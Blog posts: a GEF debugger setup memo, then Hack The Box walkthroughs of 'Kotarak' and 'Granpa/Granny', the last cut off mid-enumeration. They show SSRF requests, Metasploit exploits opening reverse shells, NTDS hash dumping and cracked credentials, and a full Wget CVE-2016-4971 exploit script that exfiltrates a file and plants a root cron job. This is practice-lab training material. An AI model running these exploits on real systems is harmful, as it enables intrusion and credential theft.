Setup memo for GDB Enhanced Features (GEF)

Explanation

GDB Enhanced Features(GEF)” is a GDB extension to provide additional commands for dynamic analysis and exploit development.
To setup for Kali linux, we need some steps and this is a memo for that.

Environment

  • OS: Kali linux 2019.4
  • GDB: gdb (Debian 8.3.1-1) 8.3.1

Solution

1. Initial Setup

On the Github repository, we have some Explanation for installation.
However, they didn’t work and the following script achieves the purpose.

root@kali:~# git clone https://github.com/hugsy/gef.git

---

root@kali:~# echo source `pwd`/gef/gef.py >> ~/.gdbinit

With the following command, we can confirm the GEF running.
However, we still have some missing commands.

root@kali:~# gdb -q test
GEF for linux ready, type `gef' to start, `gef config' to configure
77 commands loaded for GDB 8.3.1 using Python engine 3.7
[*] 3 commands could not be loaded, run `gef missing` to know why.
Reading symbols from test...
(No debugging symbols found in test)
gef➤  

With the command “gef missing”, we can find the names of command missing.

gef➤  gef missing
[*] Command `set-permission` is missing, reason  →  Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
[*] Command `ropper` is missing, reason  →  Missing `ropper` package for Python3, install with: `pip3 install ropper`.
[*] Command `assemble` is missing, reason  →  Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
gef➤  

Then, install the prerequisites.

root@kali:~# apt-get install cmake

---

root@kali:~# pip3 install keystone-engine ropper unicorn

---

However, still some commands are missing.

gef➤  gef missing
[*] Command `set-permission` is missing, reason  →  Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
[*] Command `assemble` is missing, reason  →  Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
gef➤  

This time, we need to build the “keystone” manually.
The source code can be downloaded from the release page of official repository.

root@kali:~# ls -l | grep keystone
-rw-r--r--  1 root root  4326151 Jan 17 02:30 keystone-0.9.1.tar.gz

root@kali:~# tar xzvf keystone-0.9.1.tar.gz 

---

root@kali:~# cd keystone-0.9.1/
root@kali:~/keystone-0.9.1# mkdir build
root@kali:~/keystone-0.9.1# cd build/
root@kali:~/keystone-0.9.1/build# ../make-share.sh

---

root@kali:~/keystone-0.9.1/build# make install

---

root@kali:~/keystone-0.9.1/build# ldconfig

After that, we can confirm that we have no missing commands.

root@kali:~/keystone-0.9.1/build# gdb -q test
GEF for linux ready, type `gef' to start, `gef config' to configure
80 commands loaded for GDB 8.3.1 using Python engine 3.7
Reading symbols from test...
(No debugging symbols found in test)
gef➤  gef missing
[+] No missing command
gef➤ 

Hackthebox Kotarak Walkthrough

placeholder

Retired date: 2018/03/10

Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
For the practice, solve the left boxes in the list of OSCP like boxes and this is a walkthrough of a box “Kotarak”.
placeholder

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.55 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 00:42 EET
Nmap scan report for 10.10.10.55
Host is up (0.045s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
|   256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_  256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods:
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp  open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title:         Kotarak Web Hosting
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.28 seconds

root@kali:~#

Gobuster port 8080:

root@kali:~# gobuster dir -u http://10.10.10.55:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt -s '200,204,301,302,403'
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.55:8080/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2020/01/14 01:55:44 Starting gobuster
===============================================================
/docs (Status: 302)
/examples (Status: 302)
/manager (Status: 302)
/RELEASE-NOTES.txt (Status: 200)
===============================================================
2020/01/14 03:01:44 Finished
===============================================================

root@kali:~# 

Gobuster port 60000:

root@kali:~# gobuster dir -u http://10.10.10.55:60000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt -s '200,204,301,302,403'
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.55:60000/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,html,php
[+] Timeout:        10s
===============================================================
2020/01/14 00:46:42 Starting gobuster
===============================================================
/info.php (Status: 200)
/index.php (Status: 200)
/url.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/01/14 01:52:27 Finished
===============================================================

root@kali:~# 

2. Getting User

We have 2 interesting services.
On the port 8080, we have Tomcat and on the port 60000, we can find a “Private Browser”. placeholder

By adding a parameter, we can view the prohibited web pages of Kotarak like “server-status”.
Meaning, this web application has a SSRF (Server Side Request Forgery) vulnerability and an attacker can view the hidden services.
The interesting point is that “Kotarak” has a running service on “127.0.0.1:888”.

Request to see “http://10.10.10.55:60000”:

http://10.10.10.55:60000/url.php?path=http://localhost:60000/server-status

placeholder

Then,take a look at “127.0.0.1:888” by sending the following request to the native web browser.

Request to see “http://10.10.10.55:8888”:

http://10.10.10.55:60000/url.php?path=http://localhost:888

placeholder

To go to each hyperlink, sounds we need to add “?doc=backup” parameter.
So, “http://localhost:888/?doc=backup” is the appropriate URL to access to these links.

root@kali:~# curl -s http://10.10.10.55:60000/url.php?path=http://localhost:888 | grep backup
    <td width="27"><a href="?doc=backup"  class="tableElement"><img src="inc/images/generic.png" alt="dir" width="22" height="22" border="0"></a></td>
    <td class="tableElement"><a href="?doc=backup"  class="tableElement">backup</a></td>

root@kali:~#

Then, try to access the “backup” file on the port 888.
Sounds it’s empty page but by taking a look at source code, we can find a hidden credential. placeholder

root@kali:~# curl -s http://10.10.10.55:60000/url.php?path=localhost:888/?doc=backup | grep password
  you must define such a user - the username and password are arbitrary. It is
  them. You will also need to set the passwords to something appropriate.
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
    <user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>

root@kali:~#

By going to “http://10.10.10.55:8080/manager/html” and try some possible password combination,
we can figure out the following credential is available for tomcat.

admin:3@g01PdhB!

placeholder

Since we have an exploit for tomcat, take advantage of the credential and get the user shell of “tomcat”.

msf5 > use exploit/multi/http/tomcat_mgr_upload 
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername admin
httpusername => admin
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword 3@g01PdhB!
httppassword => 3@g01PdhB!
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.55
rhost => 10.10.10.55
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.10.14.36:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 63aGm6...
[*] Executing 63aGm6...
[*] Undeploying 63aGm6 ...
[*] Sending stage (53906 bytes) to 10.10.10.55
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.10.55:53600) at 2020-01-14 14:53:18 +0200

meterpreter > getuid
Server username: tomcat

meterpreter > 

It is still not possible to get the “user.txt”.
However, we can get some Interesting files.

meterpreter > pwd
/home/tomcat/to_archive/pentest_data
meterpreter > ls
Listing: /home/tomcat/to_archive/pentest_data
=============================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  16793600  fil   2017-07-21 19:16:23 +0300  20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
100666/rw-rw-rw-  12189696  fil   2017-07-21 19:16:45 +0300  20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

meterpreter >

We can download these files by “download” command of meterpreter shell.

meterpreter > download 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit

---

meterpreter > download 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

These files look like NTDS file for database of Active directory.
.dit stands for “Directory Information Tree” and the hierarchy of network objects and access permissiona are saved.
To confirm what are these files, we can use “file” command.

root@kali:~# file 2017072111463*
20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin: MS Windows registry file, NT/2000 or above

root@kali:~#

Since we had a NTDS file and system hive, we can extract the password hash of the users.
We can refer this article for the additional information.

root@kali:~# impacket-secretsdump -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit LOCAL
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
[*] Reading and decrypting hashes from 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Kerberos keys from 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit 
Administrator:aes256-cts-hmac-sha1-96:6c53b16d11a496d0535959885ea7c79c04945889028704e2a4d1ca171e4374e2
Administrator:aes128-cts-hmac-sha1-96:e2a25474aa9eb0e1525d0f50233c0274
Administrator:des-cbc-md5:75375eda54757c2f
WIN-3G2B0H151AC$:aes256-cts-hmac-sha1-96:84e3d886fe1a81ed415d36f438c036715fd8c9e67edbd866519a2358f9897233
WIN-3G2B0H151AC$:aes128-cts-hmac-sha1-96:e1a487ca8937b21268e8b3c41c0e4a74
WIN-3G2B0H151AC$:des-cbc-md5:b39dc12a920457d5
WIN-3G2B0H151AC$:rc4_hmac:668d49ebfdb70aeee8bcaeac9e3e66fd
krbtgt:aes256-cts-hmac-sha1-96:14134e1da577c7162acb1e01ea750a9da9b9b717f78d7ca6a5c95febe09b35b8
krbtgt:aes128-cts-hmac-sha1-96:8b96c9c8ea354109b951bfa3f3aa4593
krbtgt:des-cbc-md5:10ef08047a862046
krbtgt:rc4_hmac:ca1ccefcb525db49828fbb9d68298eee
WIN2K8$:aes256-cts-hmac-sha1-96:289dd4c7e01818f179a977fd1e35c0d34b22456b1c8f844f34d11b63168637c5
WIN2K8$:aes128-cts-hmac-sha1-96:deb0ee067658c075ea7eaef27a605908
WIN2K8$:des-cbc-md5:d352a8d3a7a7380b
WIN2K8$:rc4_hmac:160f6c1db2ce0994c19c46a349611487
WINXP1$:aes256-cts-hmac-sha1-96:347a128a1f9a71de4c52b09d94ad374ac173bd644c20d5e76f31b85e43376d14
WINXP1$:aes128-cts-hmac-sha1-96:0e4c937f9f35576756a6001b0af04ded
WINXP1$:des-cbc-md5:984a40d5f4a815f2
WINXP1$:rc4_hmac:6f5e87fd20d1d8753896f6c9cb316279
WIN2K31$:aes256-cts-hmac-sha1-96:f486b86bda928707e327faf7c752cba5bd1fcb42c3483c404be0424f6a5c9f16
WIN2K31$:aes128-cts-hmac-sha1-96:1aae3545508cfda2725c8f9832a1a734
WIN2K31$:des-cbc-md5:4cbf2ad3c4f75b01
WIN2K31$:rc4_hmac:cdd7a7f43d06b3a91705900a592f3772
WIN7$:aes256-cts-hmac-sha1-96:b9921a50152944b5849c706b584f108f9b93127f259b179afc207d2b46de6f42
WIN7$:aes128-cts-hmac-sha1-96:40207f6ef31d6f50065d2f2ddb61a9e7
WIN7$:des-cbc-md5:89a1673723ad9180
WIN7$:rc4_hmac:24473180acbcc5f7d2731abe05cfa88c
atanas:aes256-cts-hmac-sha1-96:933a05beca1abd1a1a47d70b23122c55de2fedfc855d94d543152239dd840ce2
atanas:aes128-cts-hmac-sha1-96:d1db0c62335c9ae2508ee1d23d6efca4
atanas:des-cbc-md5:6b80e391f113542a
[*] Cleaning up... 

root@kali:~# 

We can crack some of the hashes by using CrackStation placeholder placeholder

Now we had the following credentials.

admin:f16tomcat!
atanas:Password123!

Then, move to the user “atanas”.
This time, the following credential worked.

atanas:f16tomcat!
meterpreter > execute -i -f /bin/bash
Process 3 created.
Channel 3 created.

python -c 'import pty;pty.spawn("/bin/bash")'

tomcat@kotarak-dmz:/$ su atanas
su atanas
Password: f16tomcat!

atanas@kotarak-dmz:/$

“user.txt” is in the directory “/home/atanas”.

atanas@kotarak-dmz:~$ pwd
pwd
/home/atanas

atanas@kotarak-dmz:~$ cat user.txt
cat user.txt
93f844f50491ef797c9c1b601b4bece8

atanas@kotarak-dmz:~$ 

3. Getting Root

Even though “atanas” is a general user, we can take a look at the “/root” directory as “atanas”.
In that directory, we have 2 interesting files “flag.txt” and “app.log”.

flag.txt:

atanas@kotarak-dmz:/root$ cat flag.txt
cat flag.txt
Getting closer! But what you are looking for can't be found here.

atanas@kotarak-dmz:/root$

app.log:

atanas@kotarak-dmz:/root$ cat app.log
cat app.log
10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"

atanas@kotarak-dmz:/root$

Sounds “10.0.3.133” is continuously sending GET request to this host with Wget 1.16.
By googling like following,
we can find a vulnerability GNU Wget 1.18 - Arbitrary File Upload / Remote Code Execution.

wget 1.16 vulnerability

According to the vulnerability description, we have to create a .wgetrc file.

root@kali:~# cat .wgetrc 
post_file = /root/root.txt
output_document = /etc/cron.d/wget-root-shell

root@kali:~# 

After that, install pyftpdlib and launch the FTP server with the following command.

root@kali:~# pip install pyftpdlib

---

root@kali:~# python -m pyftpdlib -p 21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-14 18:13:11] >>> starting FTP server on 0.0.0.0:21, pid=111918 <<<
[I 2020-01-14 18:13:11] concurrency model: async
[I 2020-01-14 18:13:11] masquerade (NAT) address: None
[I 2020-01-14 18:13:11] passive ports: None

Also, according to the description, we need a python script “wget-exploit.py”

root@kali:~# cat wget-exploit.py 
#!/usr/bin/env python

#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971 
#

import SimpleHTTPServer
import SocketServer
import socket;

class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       # This takes care of sending .wgetrc

       print "We have a volunteer requesting " + self.path + " by GET :)\n"
       if "Wget" not in self.headers.getheader('User-Agent'):
          print "But it's not a Wget :( \n"
          self.send_response(200)
          self.end_headers()
          self.wfile.write("Nothing to see here...")
          return

       print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
       self.send_response(301)
       new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
       print "Sending redirect to %s \n"%(new_path)
       self.send_header('Location', new_path)
       self.end_headers()

   def do_POST(self):
       # In here we will receive extracted file and install a PoC cronjob

       print "We have a volunteer requesting " + self.path + " by POST :)\n"
       if "Wget" not in self.headers.getheader('User-Agent'):
          print "But it's not a Wget :( \n"
          self.send_response(200)
          self.end_headers()
          self.wfile.write("Nothing to see here...")
          return

       content_len = int(self.headers.getheader('content-length', 0))
       post_body = self.rfile.read(content_len)
       print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)

       print "Sending back a cronjob script as a thank-you for the file..." 
       print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(ROOT_CRON)

       print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"

       return

HTTP_LISTEN_IP = '192.168.57.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.57.1'
FTP_PORT = 21

ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n"

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
   print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
   print "FTP is down :( Exiting."
   exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT

handler.serve_forever()

However, the above script is just an example and we have to modify the following points of the script.

root@kali:~# cat -n wget-exploit.py | head -n 65 | tail -n 4
    62	HTTP_LISTEN_IP = ''
    63	HTTP_LISTEN_PORT = 80
    64	FTP_HOST = '10.10.14.36'
    65	FTP_PORT = 21

Then, go to a directory that we have write permission on the “Kotarak”.
Upload the python script “wget-exploit.py”.

meterpreter > pwd
/tmp
meterpreter > upload ./wget-exploit.py
[*] uploading  : ./wget-exploit.py -> wget-exploit.py
[*] Uploaded -1.00 B of 2.77 KiB (-0.04%): ./wget-exploit.py -> wget-exploit.py
[*] uploaded   : ./wget-exploit.py -> wget-exploit.py

meterpreter > 

Generally, we can’t use the port 80 as a general user.
But, we can obtain the purpose by using “authbind” command.
In the POST request, we can see the content of “root.txt”.

atanas@kotarak-dmz:/tmp$ authbind --deep python wget-exploit.py
authbind --deep python wget-exploit.py
Ready? Is your FTP server running?
FTP found open on 10.10.14.36:21. Let's go then

Serving wget exploit on port 80...


We have a volunteer requesting /archive.tar.gz by GET :)

Uploading .wgetrc via ftp redirect vuln. It should land in /root 

10.0.3.133 - - [14/Jan/2020 12:12:01] "GET /archive.tar.gz HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@10.10.14.36:21/.wgetrc 

We have a volunteer requesting /archive.tar.gz by POST :)

Received POST from wget, this should be the extracted /etc/shadow file: 

---[begin]---
 950d1425795dfd38272c93ccbb63ae2c

---[eof]---


Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)
10.0.3.133 - - [14/Jan/2020 12:14:01] "POST /archive.tar.gz HTTP/1.1" 200 -

File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) 

Output of python local FTP server:

root@kali:~# python -m pyftpdlib -p 21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-14 19:06:59] >>> starting FTP server on 0.0.0.0:21, pid=115096 <<<
[I 2020-01-14 19:06:59] concurrency model: async
[I 2020-01-14 19:06:59] masquerade (NAT) address: None
[I 2020-01-14 19:06:59] passive ports: None
[I 2020-01-14 19:07:11] 10.10.10.55:54274-[] FTP session opened (connect)
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[] FTP session opened (connect)
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] USER 'anonymous' logged in.
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] RETR /root/.wgetrc completed=1 bytes=73 seconds=0.002
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] FTP session closed (disconnect).

Hackthebox Granpa/Granny Walkthrough

placeholder

Retired date: 2017/07/07

Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
For the practice, solve the left boxes in the list of OSCP like boxes and this is a walkthrough of a box “Granpa” and we can use same technique for “Granny” also.
placeholder

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.14 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 15:15 EET
Nmap scan report for 10.10.10.14
Host is up (0.044s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Type: Microsoft-IIS/6.0
|_  Server Date: Sat, 11 Jan 2020 13:21:06 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.63 seconds

root@kali:~#

2. Getting User

Nmap revealed only one service, Microsoft IIS version 6 with WebDAV running on the IIS server.
Then, google following keyword.

webdav iis 6 exploit

We can find an exploit “Microsoft IIS 6.0 - WebDAV ‘ScStoragePathFromUrl’”.
Also, searchsploit can find the same vulnerability with the following way.

root@kali:~# searchsploit iis 6 webdav
------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                            |  Path
                                                                                          | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)                           | exploits/windows/remote/16471.rb
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1 | exploits/windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2 | exploits/windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3 | exploits/windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4 | exploits/windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)              | exploits/windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service                                              | exploits/windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service                     | exploits/windows/dos/22670.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure                            | exploits/windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                  | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                               | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                               | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                             | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                           | exploits/windows/remote/8754.patch
------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

root@kali:~# 

By the following way, we can exploit the vulnerability with Metasploit.
Now we got a shell as user “authority\network service”.
However, in this time, it’s not possible to achieve “user.txt”.

msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl 
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.36:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (180291 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.10.14:1031) at 2020-01-11 15:49:29 +0200

meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2112 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\Documents and settings>whoami
whoami
nt authority\network service

c:\Documents and settings>

3. Getting Root

Since “nt authority\network service” has less permission than ordinary users, we can not use some common commands here.

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

meterpreter > 

Before getting SYSTEM shell, we need to achieve another process having better permission.
This time, we cab migrate to the process “notepad.txt”.

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 272   4     smss.exe                                                        
 324   272   csrss.exe                                                       
 348   272   winlogon.exe                                                    
 396   348   services.exe                                                    
 400   616   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 408   348   lsass.exe                                                       
 616   396   svchost.exe                                                     
 684   396   svchost.exe                                                     
 740   396   svchost.exe                                                     
 768   396   svchost.exe                                                     
 804   396   svchost.exe                                                     
 940   396   spoolsv.exe                                                     
 968   396   msdtc.exe                                                       
 1080  396   cisvc.exe                                                       
 1124  396   svchost.exe                                                     
 1132  1080  cidaemon.exe                                                    
 1184  396   inetinfo.exe                                                    
 1220  396   svchost.exe                                                     
 1332  396   VGAuthService.exe                                               
 1412  396   vmtoolsd.exe                                                    
 1460  396   svchost.exe                                                     
 1600  396   svchost.exe                                                     
 1708  396   alg.exe                                                         
 1816  616   wmiprvse.exe       x86   0                                      \Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe
 1920  396   dllhost.exe                                                     
 2180  1460  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2248  616   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2328  1080  cidaemon.exe                                                    
 2356  1080  cidaemon.exe                                                    
 2492  616   wmiprvse.exe                                                    
 2872  1816  notepad.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\notepad.exe
 2972  348   logon.scr                                                       
 3560  1460  w3wp.exe                                                        
 3744  2180  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe

meterpreter > migrate 2872
[*] Migrating from 3744 to 2872...
[*] Migration completed successfully.

meterpreter >

To find out a vulnerability, we can use the Metasploit module “local_exploit_suggester”.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
